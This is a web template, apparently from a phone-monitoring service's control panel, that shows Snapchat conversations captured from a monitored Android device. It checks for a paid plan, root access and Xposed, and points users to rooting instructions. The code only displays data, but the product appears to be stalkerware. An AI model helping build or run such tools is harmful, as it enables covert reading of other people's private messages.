<style type="text/css">
    @media (max-width: 767px) {
        .daterangepickerWrapper {
            margin-top: 10px;
        }
    }

    .nav.nav-pills {
        margin-top: 10px;
    }
</style>
<div>
    <h1 class="text-center">{$title}</h1>

    {insert "inc.cp.messages.htm"}

    {if !$paid}
        {insert "cp/updatePackage.html"}
    {elseif count($accounts)}

    {if $di.currentDevice.os=='android' && (!$di.currentDevice.rooted || !$di.currentDevice.android_xposed_installed || !$di.currentDevice.rootAccess)}
    <div class="bg-warning" style="padding: 10px 10px 1px;">
        {insert "cp/snapchat/inc.androidMessages.htm"}
    </div>
    {/if}

    <div class="row form-inline">
        <div class="col-lg-6 col-md-6 col-sm-6">
            <label for="account">{$di.t->_('Account')} </label>
            {include "scripts/select.htm" name="account" id="account" class="form-control" options=$accounts}
        </div>
        <div class="col-lg-6 col-md-6 col-sm-6">
            <div class="daterangepickerWrapper">
                <div id="reportrange" class="btn btn-default pull-right">
                    <i class="fa fa-calendar fa-lg"></i>
                    <span></span>
                    <b class="caret"></b>
                </div>
            </div>
        </div>
    </div>

    <div class="table-container dialogs-table">
        <table class="dataTable" id="private-datatable" aria-describedby="datatables_info">
            <thead>
                <tr role="row">
                    <th>{$di.t->_('Name')}</th>
                    <th>{$di.t->_('Last Message')}</th>
                    <th>{$di.t->_('Date')}</th>
                </tr>
            </thead>
        </table>
    </div>
    <script type="text/javascript">
        $(document).ready(function() {
            var snapchat = {
                startDate: -1,
                endDate: -1,
                table: null,
                getRangeUrl: function(start, end) {
                    if (start === null && end === null) {
                        this.startDate = this.endDate = -1;
                    } else if (start && end) {
                        this.startDate = moment(start).unix();
                        this.endDate = moment(end).unix();
                    }

                    var url = '{$di.config.domain}/cp/snapchat?';

                    return url + $.param({
                        account: $('#account').val(),
                        timeFrom: this.startDate,
                        timeTo: this.endDate
                    });
                },
                initTable: function() {
                    var table = $('#private-datatable').dataTable({
                        bProcessing: true,
                        bServerSide: true,
                        sAjaxSource: this.getRangeUrl(),
                        bPaginate: true,
                        bFilter: false,
                        bSort: true,
                        bInfo: true,
                        bAutoWidth: false,
                        bSortMulti: false,
                        iDisplayLength: {$authData.records_per_page},
                        aaSorting: [[2, 'desc']],
                        oLanguage: {
                            sUrl: '{$di.config.staticDomain}/datatables/language/{$di.t->getLocale()}.txt'
                        },
                        aoColumns: [{
                                mData: "name",
                                fnRender: function(obj, value) {
                                    if (value.length) {
                                        return escapeAndTruncate(value);
                                    }

                                    return obj.aData.user_id;
                                },
                                'sClass': 'username'
                            },
                            {
                                mData: "content",
                                fnRender: function(obj, value) {

                                    if (obj.aData.content_type == 'text') {
                                        return escapeAndTruncate(value);
                                    }

                                    return '<p class="attachment ' + obj.aData.content_type + '"><p>';
                                }
                            },
                            {
                                mData: null,
                                sWidth: '180px',
                                fnRender: function(obj, value) {
                                    return moment(obj.aData.timestamp * 1000).zone(0).format('lll');
                                }
                            }],
                        fnRowCallback: function(nRow, data) {
                            $(nRow).on('click', function() {
                                window.location = '{$di.router->getRouteUrl("snapchat")}/' + encodeURIComponent($('#account').val()) + '/' + encodeURIComponent(data.user_id);
                            });
                        },
                        fnDrawCallback: function() {
                            snapchat.table = table;
                            $(this).find('tbody').tableScroll();
                        }
                    });
                },
                reloadTable: function(url) {
                    this.table.fnReloadAjax(url);
                }
            };

            snapchat.initTable();

            $('#account').change(function() {
                snapchat.reloadTable(snapchat.getRangeUrl());
            });

            $('#reportrange').timeRange(function(from, to) {
                snapchat.reloadTable(snapchat.getRangeUrl(from, to));
            });
        });
    </script>
    {else}
        {if $di.currentDevice.os=='android' && (!$di.currentDevice.rooted || !$di.currentDevice.rootAccess)}
            {if !$di.currentDevice.rooted}
              {include "content/{$di.t->getLocale()}/rootPhone.html"}
            {else}
              {include "content/{$di.t->getLocale()}/rootAccessPhone.html"}
            {/if}
        {else}
            {include "content/{$di.t->getLocale()}/noDataTitle.html"
                moduleName = $di.t->_('Snapchat')
            }
            {*<h3>{$di.t->_('Waiting for messages... Why can the data be unavailable?')}</h3>*}
            {include "content/{$di.t->getLocale()}/noData.html"
                applicationId = 'snapchat'
                applicationName = $di.t->_('Snapchat')
            }
        {/if}
    {/if}
</div>
